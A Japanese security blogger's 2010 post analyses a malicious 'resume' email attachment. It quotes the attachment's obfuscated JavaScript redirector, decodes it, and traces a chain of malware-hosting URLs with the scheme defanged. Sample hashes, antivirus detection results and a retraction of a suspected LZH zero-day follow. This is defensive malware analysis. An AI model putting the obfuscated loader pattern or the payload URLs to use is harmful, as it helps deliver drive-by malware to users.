FC2ブログ

スポンサーサイト

上記の広告は1ヶ月以上更新のないブログに表示されています。
新しい記事を書く事で広告が消せます。

【今日の難読スクリプト】続編 LZHのゼロデイ?

件名
I've attached...I'm enclosing... the latest figures for you.

本文
I have attached the resume.

添付ファイル
77330resume.html

内容 はさっきの奴と一緒
var s="ほにゃらかuuq;00uigsjjtkfotfo/el0jgsbnfgjmf/ktほにゃらか";
m=""; for (i=0; i<s.length; i++) m+=String.fromCharCode(s.charCodeAt(i)-1); document.write(m);
→ s.charCodeAt(i)-1 なのでひとつ前に戻すと。要はHAL→IBMですね。
h丁丁p://thfriisjensen.dk/iframefile.js となります。(A)

誘導スクリプト → 中継点(A)→配布先

つまり、上記ような構造となっており、誘導スクリプトは姿を変えウイルス対策ソフトをかいくぐる、が誘導先(A)はそんなに変化しない。
ちなみに、このAのルート http://thfriisjensen.dk/ はこういうサイトだ。
thfriisjensendk.jpg

置き場にされているのだろう。で、今回は以下の内容だった。
h丁丁p://hojikyp.co.cc/ajax/index.php?ajax=do&past=back&catid=168&name=boz&app=post
さっきとは異なる。
さっき→h丁丁p://wiqosah.co.cc/images/?str=get&cat=168&pool=undo&refresh=img&action=boz&app=param
今回→→h丁丁p://hojikyp.co.cc/ajax/index.php?ajax=do&past=back&catid=168&name=boz&app=post

さっきと違うことが分かります。ここにアクセスすると以下のものが落ちてきた。

h丁丁p://hojikyp.co.cc/news/exe.php?x=jar5 → lzhファイル
h丁丁p://hojikyp.co.cc/news/exe.php?x=jjar → lzhファイル →チェック結果
上記二つは同一ファイル。LZHの修復不可能な脆弱性を突くやつだろうか?もしそうだと目茶目茶やばいな。
MD5: 28f2ee30b443160f76166bd15287bb02
Date first seen: 2010-09-22 18:44:54 (UTC)
Date last seen: 2010-09-22 18:44:54 (UTC)
Detection ratio: 4/43

検体を、ジェペットおじさんとピノキオさんら、クジラの中の人に送ってコメントをもらおう。

21:21 追記
クジラの中のジェペット爺さんから連絡があり、LZHのゼロデイではない、中身は単なるexeだと。orz。中身を見ればよかったな。すみませんでした。お騒がせしました。


もしこれが、LZHのゼロデイならば作者は、使用をやめてくれと言っているが、それではだめだ。
LZH系のアプリやDLLをアンインストールしないといけない。

勝手にダウンロードされてしまうからだ。

h丁丁p://hojikyp.co.cc/news/j.php → javaプログラム →チェック結果
MD5: 84f5defe4328d0c31cafb136a3cc5a89
Date first seen: 2010-09-13 10:41:25 (UTC)
Date last seen: 2010-09-23 02:03:33 (UTC)
Detection ratio: 8/42

h丁丁p://hojikyp.co.cc/news/jar5.php → javaプログラム →チェック結果
MD5: 4eea7ae357eecaa94c084083dd4e56da
Date first seen: 2010-09-14 08:04:12 (UTC)
Date last seen: 2010-09-23 08:27:00 (UTC)
Detection ratio: 11/43

h丁丁p://hojikyp.co.cc/news/js.php → javaスクリプト →チェック結果
MD5: b74b43a2fe25a8b253a4310ee827ae77
Date first seen: 2010-05-28 12:53:42 (UTC)
Date last seen: 2010-09-23 08:54:44 (UTC)
Detection ratio: 3/43
Antivirus Version Last update Result
AhnLab-V3 2010.09.21.01 2010.09.21 -
AntiVir 8.2.4.60 2010.09.22 -
Antiy-AVL 2.0.3.7 2010.09.22 -
Authentium 5.2.0.5 2010.09.22 -
Avast 4.8.1351.0 2010.09.22 -
Avast5 5.0.594.0 2010.09.22 -
AVG 9.0.0.851 2010.09.22 -
BitDefender 7.2 2010.09.22 -
CAT-QuickHeal 11.00 2010.09.21 (Suspicious) - DNAScan
ClamAV 0.96.2.0-git 2010.09.22 -
Comodo 6164 2010.09.22 -
DrWeb 5.0.2.03300 2010.09.22 -
Emsisoft 5.0.0.37 2010.09.22 -
eSafe 7.0.17.0 2010.09.21 -
eTrust-Vet 36.1.7870 2010.09.22 -
F-Prot 4.6.2.117 2010.09.22 -
F-Secure 9.0.15370.0 2010.09.22 -
Fortinet 4.1.143.0 2010.09.22 -
GData 21 2010.09.22 -
Ikarus T3.1.1.88.0 2010.09.22 -
Jiangmin 13.0.900 2010.09.21 -
K7AntiVirus 9.63.2582 2010.09.22 -
Kaspersky 7.0.0.125 2010.09.22 -
McAfee 5.400.0.1158 2010.09.22 -
McAfee-GW-Edition 2010.1C 2010.09.22 -
Microsoft 1.6201 2010.09.22 -
NOD32 5471 2010.09.22 -
Norman 6.06.06 2010.09.22 -
nProtect 2010-09-22.02 2010.09.22 -
Panda 10.0.2.7 2010.09.22 -
PCTools 7.0.3.5 2010.09.22 HeurEngine.ZeroDayThreat
Prevx 3.0 2010.09.22 -
Rising 22.66.00.07 2010.09.21 -
Sophos 4.57.0 2010.09.22 Mal/EncPk-NS
Sunbelt 6911 2010.09.22 -
SUPERAntiSpyware 4.40.0.1006 2010.09.22 -
Symantec 20101.1.1.7 2010.09.22 Suspicious.AD
TheHacker 6.7.0.0.027 2010.09.21 -
TrendMicro 9.120.0.1004 2010.09.22 -
TrendMicro-HouseCall 9.120.0.1004 2010.09.22 -
VBA32 3.12.14.1 2010.09.22 -
ViRobot 2010.8.31.4017 2010.09.22 -
VirusBuster 12.65.20.1 2010.09.22 -
MD5: 28f2ee30b443160f76166bd15287bb02
SHA1: 97542cd7ceb7e9d617d56f48edb5e868d6fc5f33
SHA256: 548077c0cb4b99b146e0a2cbf5c874b058eaaf417b0a0126199121bb7d19cdb4
File size: 169984 bytes
Scan date: 2010-09-22 18:44:54 (UTC)

コメント

No title

クジラの中のジェペット爺さんから連絡があり、LZHのゼロデイではない、中身は単なるexeだと。orz。中身を見ればよかったな。すみませんでした。お騒がせしました。

非公開コメント

プロフィール

どらいつ 家主:どらいつ

情報セキュリティ会社勤務。13年前からタバコを止めたが禁煙はしてない。ダイエットとリバウンドの繰り返し。


1958年 北九州市生まれ。大原小学校、池田小学校、香月中学、北九州予備校、東筑高校、熊本大学土木科(中退)、1984年就職、現在にいたる。

中学時は水泳部。部内で平泳ぎ 4位(4人中)。高校・大学時代9年間はラグビー。ポジションはフッカー。当時に今の体重があれば、、

ツイッター(Twitter) dry2
つぶやきログ(Twilog) dry2
日経電子版コラム
日経BP連載
グーグル+写真アルバム
フォト蔵 dry2

最新記事
最新コメント
カテゴリ
RSS
どらいつのお気に入り
上記広告は1ヶ月以上更新のないブログに表示されています。新しい記事を書くことで広告を消せます。